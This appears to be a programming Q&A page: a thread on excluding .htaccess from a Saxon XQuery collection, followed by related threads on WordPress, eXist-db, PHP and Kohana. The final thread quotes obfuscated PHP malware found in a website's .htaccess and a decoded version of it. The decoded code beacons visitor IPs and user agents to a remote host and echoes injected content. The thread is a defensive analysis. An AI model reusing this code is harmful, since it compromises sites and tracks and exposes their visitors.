Can Saxon work on a page with .htaccess?

Due to some issues with the php version of Saxon, I currently have a convoluted setup where I do a php call to execute a java command, convert the results into html, display that html on my page, and then delete the resulting html after display. I can provide a link to the page if it helps, but the actual .xq file is pretty simplistic:
xquery version "1.0" encoding "UTF-8";
declare namespace tei="http://www.tei-c.org/ns/1.0";

declare variable $zone external;
declare variable $line external;
declare variable $collection external;

declare function local:if-empty
  ( $arg as item()? ,
    $value as item()* ) as item()* {
  if (string($arg) != '')
  then data($arg)
  else $value
};

declare function local:remove-elements($input as element(), $remove-names as xs:string*) as element() {
  element { node-name($input) }
  { $input/@*,
    for $child in $input/node()[not(name(.) = $remove-names)]
    return
      if ($child instance of element())
      then local:remove-elements($child, $remove-names)
      else $child
  }
};

declare function local:remove-empty-elements($nodes as node()*) as node()* {
  for $node in $nodes
  return
    if (empty($node)) then ()
    else if ($node instance of element())
    then if (normalize-space($node) = '')
         then ()
         else element { node-name($node) }
              { $node/@*,
                local:remove-empty-elements($node/node()) }
    else if ($node instance of document-node())
    then local:remove-empty-elements($node/node())
    else $node
};

<list>
{
  let $q := collection($collection)
  let $remove-list := ('note')
  (: let $q := local:remove-empty-elements($q) :)
  for $y in $q
  let $s := $y//tei:surface
  let $t := $y//tei:titleStmt/@xml:id
  let $m := $y//tei:msDesc/@xml:id
  let $z := $s/tei:zone[@n = $zone]
  let $l := $z/tei:line[@n = $line]
  let $w := concat($y//tei:msDesc/tei:msIdentifier/tei:settlement/text(), ', ',
                   $y//tei:msDesc/tei:msIdentifier/tei:institution/text(), ' ',
                   $y//tei:msDesc/tei:msIdentifier/tei:idno/text())
  let $g := concat($t, "/", $m, "/", substring-before($l/../../tei:graphic/@url, "."), ".html")
  let $o := local:remove-elements($l/tei:orig, $remove-list)
  where ($z//tei:line/@n = "l.1")
  return
    <item>{$w}: <ref target="{$g}">{$o}</ref></item>
}
</list>
and the command to run it is:
java -Xms128m -Xmx1024m -XX:+UseCompressedOops -cp saxon9he.jar net.sf.saxon.Query -t -q:test.xq -o:1505740041.41932650059544.xml line=l.4 zone=EETS.QD.8 collection=file:<filefolder>
My problem is that the xml files I'm working with are currently unpublished transcriptions, and I'd like to keep them behind a password protected folder until I think they're ready for prime time. If I have any sort of .htaccess file in the filefolder location, I get the following error message:
Building tree for file:<filefolder>/.htaccess using class net.sf.saxon.tree.tiny.TinyBuilder
Error on line 1 column 1 of .htaccess:
SXXP0003: Error reported by XML parser: Content is not allowed in prolog.
Query failed with dynamic error: org.xml.sax.SAXParseException; systemId: file:<filefolder>/.htaccess; lineNumber: 1; columnNumber: 1; Content is not allowed in prolog.
It's pretty obvious to me what's happening: Saxon gets to the .htaccess file, which is not XML, and then doesn't know what to do with it. My question is whether there's a way in my XQuery file to tell Saxon not to include .htaccess in the collection. I'm sure there is, but everything I've found is about finding file names, not about suppressing them in the collection you're building.

If you ever need something more elaborate than selection using a glob pattern, then you can use the uri-collection() function to return the URIs of the files in the directory, and then use doc() to process the ones that you are actually interested in. This would give you a solution if, for example, you wanted everything that doesn't start with ".", regardless of its extension.
Another thing you can do with uri-collection() is to process each returned URI within a try/catch block so you have full control over the error handling.
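A minimal sketch of that approach (assuming a processor with XQuery 3.0 support for uri-collection() and try/catch, such as a recent Saxon 9 HE release, and assuming the file name is the last path segment of each URI) could replace the let $q := collection($collection) line:
let $q :=
  (
    for $uri in uri-collection($collection)
    let $filename := tokenize($uri, '/')[last()]
    where not(starts-with($filename, '.'))
    return
      try { doc($uri) }
      catch * { () }   (: skip anything that is not well-formed XML :)
  )
With that in place, .htaccess (or any other non-XML file) is never handed to the XML parser, so the folder can stay password-protected.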

Ok, I'm just stupid. The solution is to add a concat statement to append the select info to the $collection variable, like so:
let $collection := concat($collection, '?select=*.xml')
let $q := collection($collection)
let $remove-list := ('note')

Related

Accessing Nested Attributes in a WordPress Gutenberg block via PHP

I have a working WordPress Gutenberg Block project which uses nested blocks. I'm trying to rewrite the JavaScript save function in PHP to create a dynamic block.
I've modified the PHP file to include the following:
function render_html($attributes) {
    var_dump($attributes);
    ob_start(); ?>
    <h1>Attributes</h1>
    <h3>The number of columns is <?php echo esc_html($attributes['myColumns']) ?>!</h3>
    <?php return ob_get_clean();
}
function cards_init() {
    register_block_type_from_metadata( __DIR__, array(
        'render_callback' => 'render_html'
    ) );
}
add_action( 'init', 'cards_init' );
This displays the top level attributes correctly (just one value):
C:\Users\Steve\Local Sites\netmonics6\app\public\wp-content\plugins\cards\cards.php:32:
array (size=1)
'myColumns' => int 3
Attributes
The number of columns is 3!
I'm just wondering how I access the attributes for the nested blocks?
I've used InnerBlocks in the main edit.js as follows to enable a nested block:
<InnerBlocks
    allowedBlocks={ [ 'some-name/card' ] }
    orientation="horizontal"
    template={ [
        [ 'some-name/card' ],
        [ 'some-name/card' ],
        [ 'some-name/card' ],
    ] }
/>
Does anyone please have any ideas?
Steve
InnerBlocks can be accessed via $block in the render_callback function. The syntax for the render callback is function($attributes, $content, $block), although commonly only $attributes is used, unless you want to access something inside <InnerBlocks>, eg:
PHP
/*
 * Render callback function
 * @return string HTML markup
 */
function render_html($attributes, $content, $block)
{
    $output = '';

    // Loop through each inner block
    foreach ($block->inner_blocks as $inner_block) {
        // Eg. if your ['some-name/card'] block had an attribute
        // called `someAttribute` (boolean), it could be accessed via:
        if (! empty($inner_block->attributes['someAttribute'])) {
            // Do something different with this block
            $output .= sprintf('<div class="is-some-attribute">%s</div>', $inner_block->render());
        } else {
            // Otherwise, render the block as usual..
            $output .= $inner_block->render();
        }
    }

    /*
     * Tip: Always return the content to render.
     * echo() should not be used in render_callback(), and ob_start()/ob_get_clean() are not needed.
     * Returning valid content avoids the dreaded "Invalid JSON" error in the editor.
     */
    return $output;
}
When using InnerBlocks, the save() function in JavaScript is required so that the block editor saves the InnerBlock content (even if you are using a PHP render_callback), eg:
save.js
import { useBlockProps, InnerBlocks } from '@wordpress/block-editor';

export default function save() {
    const blockProps = useBlockProps.save();
    return (
        <div { ...blockProps }>
            <InnerBlocks.Content />
        </div>
    );
}
Depending on what you need from the InnerBlocks, block context might also be useful.
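As a rough sketch of the context route (the some-name/myColumns context key and the render_card callback are hypothetical names for illustration, not part of your project): the parent block's block.json provides the value, the card block opts in with usesContext, and the card's render callback then reads it from $block->context:
/*
 * Parent block's block.json (hypothetical context key):
 *   "providesContext": { "some-name/myColumns": "myColumns" }
 *
 * Card block's block.json:
 *   "usesContext": [ "some-name/myColumns" ]
 */
function render_card($attributes, $content, $block) {
    // Value passed down by the parent block, with a fallback if it is missing
    $columns = isset($block->context['some-name/myColumns'])
        ? (int) $block->context['some-name/myColumns']
        : 3;

    return sprintf('<div class="card card-cols-%d">%s</div>', $columns, $content);
}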

How to zip binary files during function’s run in eXist-db and XQuery

I have no problem producing PDFs and offering them as response:stream-binary files for download. However, I have a problem when I try to zip the produced PDFs and do the same with the zip: it offers the zip result for download, and the PDF is included, but it has no size (an empty file).
let $pdf-binary :=
  (
    if ($pdfQuality eq 'proof' and $template eq 'draft')
    then xslfo:render(transform:transform($doc, $stylesProof, ()), 'application/pdf', (), $proofConf)
    else if ($pdfQuality eq 'print' and $template eq 'draft')
    then xslfo:render(transform:transform($doc, $stylesPrint, ()), 'application/pdf', (), $printConf)
    else if ($pdfQuality eq 'print' and $template eq 'auc-geographica')
    then xslfo:render(transform:transform($doc, $stylesAUCGeographica, ()), 'application/pdf', (), $printConf)
    else ()
  )
return
  if (not($zipAll))
  then response:stream-binary($pdf-binary, 'application/pdf', $name || '.pdf')
  else if ($zipAll)
  then (
    let $entry := <entry name="{$name}.pdf" type="binary" method="store">{util:binary-doc($pdf-binary)}</entry>
    let $zip-file := compression:zip($entry, false())
    return
      response:stream-binary($zip-file, 'application/zip', 'test.zip')
  )
  else ()
Importantly, I don’t want to store the PDF results anywhere in the DB.
Done. It was better to rearrange the project slightly: I moved the whole logic into the query that calls the rendering function. The working result is:
...
let $zip as item() :=
  (
    let $entries as item()+ :=
      (
        for $article at $count in $doc/article//tei:TEI
        let $year as xs:string := $article//tei:date/string()
        let $issue as xs:string := $article//tei:biblScope/string()
        let $pdf as xs:base64Binary := fop:render-pdf($article, $template, $name, $pdfQuality)
        return
          <entry name="{lower-case($name)}-{$year}-{$issue}-{$count}.pdf" type="binary" method="store">{$pdf}</entry>
      )
    return
      compression:zip($entries, false())
  )
return
  response:stream-binary($zip, 'application/zip', $name || '.zip')
I would be very happy if anyone could review this solution. I have learned that it is a really good idea to use strong typing and not rely on automatic conversions; without that, this code does not work. Thanks a lot to the eXist-db book by Erik Siegel and Adam Retter, where I found the hint.

Using contains key with file_get_contents

So I'm trying to read a JSON file at a separate URL, and based on what is in the JSON file I would like the program to do something. But the way I'm currently trying to do it is not working.
<?php
$homepage = file_get_contents('http://direct.cyberkitsune.net/canibuycubeworld/status.json');
//echo $homepage;
if($homepage contains 'f'){
echo 'true';
}else{
echo 'Something went terribly wrong!";
}
?>
This is the error that I get
Parse error: syntax error, unexpected T_STRING in /home/a1285224/public_html/cubeworld.php on line 4
When I looked up file_get_contents in the PHP manual, it says that it should read the entire file into a string, so I'm a little confused about why I'm getting a string error.
Thanks~
Instead of 'contains', see the strpos function. Also, you must close single quotes with single quotes, and double quotes with double quotes.
i.e.
$homepage = file_get_contents("http://direct.cyberkitsune.net/canibuycubeworld/status.json");
// echo $homepage;
if (strpos($homepage, "f") !== false)
{
    echo "true";
}
else
{
    echo "Something went terribly wrong!";
}
Based on what you are trying to do, also see PHP's JSON library.
To get the JSON data, you can use json_decode.
To dump all vars:
$json = json_decode($homepage, true);
var_dump($json);
To get all the other data:
printf("Time: %s<br>Site: %s<br>Reg: %s<br>Shop: %s", $json['time'], $json['site'], $json['reg'], $json['shop']);

Downloading files as corrupted files in Kohana

Hi guys, I'm facing a problem with file upload and download in Kohana.
My controller is like this:
class Controller_Test extends Controller
{
    public function action_display()
    {
        $type = $_FILES['file']['type'];
        switch ($type)
        {
            case 'image/gif':
                $otype = '.gif'; break;
            case 'image/jpeg':
            case 'image/pjpeg':
                $otype = '.jpg'; break;
            case 'image/png':
                $otype = '.png'; break;
            case 'application/octet-stream':
                $otype = '.doc'; break;
            case 'txt':
                $otype = '.txt'; break;
            case 'application/pdf':
                $otype = '.pdf'; break;
        }

        // rename the file
        $name = time() . '_' . mt_rand(1000, 9999) . $otype;
        $directory = $_SERVER['DOCUMENT_ROOT'].URL::base().'media';

        // uploading a file
        $filename = Upload::save($_FILES['file'], $name, $directory);

        $this->auto_render = false;
        $this->response->send_file($filename);
    }//action
}//controller
When I call this function, the file uploads fine, but it downloads as a corrupted file.
Can you help me figure out how to solve this?
Thanks in advance.
You shouldn't add URL::base() inside the path name, as that could add something like "http://..." inside the file path. Remove URL::base() and try again.
To start, there are some simple debug checks you can do here.
Is $directory valid?
Is $filename a valid file path, or is it FALSE? (See http://kohanaframework.org/3.2/guide/api/Upload#save)
I'm going to assume $directory is invalid.
You want to use the absolute path constants to build directory paths. Instead of $_SERVER['DOCUMENT_ROOT'].URL::base() (which is wrong in any case), use APPPATH or DOCROOT, eg $directory = APPPATH.'media'; see https://github.com/kohana/kohana/blob/3.2/master/index.php#L57-74
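Putting those checks together, a minimal sketch of the upload-and-download part of the action (assuming Kohana 3.2, where Upload::save() returns the full path on success or FALSE on failure) might look like:
// Build the upload directory from an absolute path constant
$directory = APPPATH.'media';   // or DOCROOT.'media'

// Upload::save() returns the full path on success, or FALSE on failure
$filename = Upload::save($_FILES['file'], $name, $directory);

if ($filename === FALSE)
{
    // Bail out early instead of handing FALSE to send_file()
    throw new Kohana_Exception('Could not save upload to :dir', array(':dir' => $directory));
}

$this->auto_render = false;
$this->response->send_file($filename);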

What does function s37 in htaccess do?

I found some code this morning, encoded under several layers, attached to the .htaccess of a website I administer. The code reads as follows:
function s37($s){for ($a = 0; $a <= strlen($s)-1; $a++ ){$e .= $s{strlen($s)-$a-1};}return($e);}eval(s37(';"ni"=73c$;"ptth"=73h$;"stats"=73z$'));eval(s37(';]"TNEGA_RESU_PTTH"[REVRES_$=3au$'));eval(s37(';)"relbmaR" ,"xednaY" ,"revihcra_ai" ,"toBNSM" ,"prulS" ,"elgooG"(yarra = 73u$'));eval(s37('}};lru$ ohce;]1[lru$ = lru$ ;)lru$,"!og!"(edolpxe = lru${))"!og!",lru$(rtsrts( fi;))]"TSOH_PTTH"[REVRES_$(edocnelru."=h&".)3au$(edocnelru."=b&".]"RDDA_ETOMER"[REVRES_$."=i"."?p"."hp.".73c$."/73c$.".73c$.73c$.73c$.73c$.73c$.73c$.73c$.73c$.73c$."//".":".73h$(stnetnoc_teg_elif# = lru$ ;)00801+)(emit,)"stats"(5dm,73z$(eikooctes# { esle }{ )))]73z$[EIKOOC_$(tessi( ro ))3au$ ,"i/" . )73u$ ,"|"(edolpmi . "/"(hctam_gerp((fi'));
Clearly details of the function are written in reverse. It looks like it is sending log information to a remote server. Anyone familiar with this code or what it is doing?
Looks like pretty heavily obfuscated stat-tracking code, but I'm more inclined to say it's malicious. s37, as noted, reverses the string:
function s37($s)
{
    $e = "";
    for ($a = 0; $a <= strlen($s)-1; $a++)
    {
        $e .= $s{strlen($s)-$a-1};
    }
    return($e);
}
This, in turn, generates the following code:
$z37="stats";
$h37="http";
$c37="in";
$ua3=$_SERVER["HTTP_USER_AGENT"];
$u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if((preg_match("/" . implode("|", $u37) . "/i", $ua3)) or (isset($_COOKIE[$z37])))
{
}
else
{
#setcookie($z37,md5("stats"),time()+10800);
$url = #file_get_contents($h37.":"."//".$c37.$c37.$c37.$c37.$c37.$c37.$c37.$c37.$c37.".$c37/".$c37.".ph"."p?"."i=".$_SERVER["REMOTE_ADDR"]."&b=".urlencode($ua3)."&h=".urlencode($_SERVER["HTTP_HOST"]));
if (strstr($url,"!go!"))
{
$url = explode("!go!",$url);
$url = $url[1];
echo $url;
}
}
The user-agent matching stuff prevents search engine bots from running the code. Otherwise, for browsers, a cookie gets set, then some code gets downloaded from a remote server and echoed out. The purpose of the code that's downloaded is hard to ascertain without more info.
function s37 reverses the supplied string. The s37 definition only accounts for the first little bit of that line of code, though...
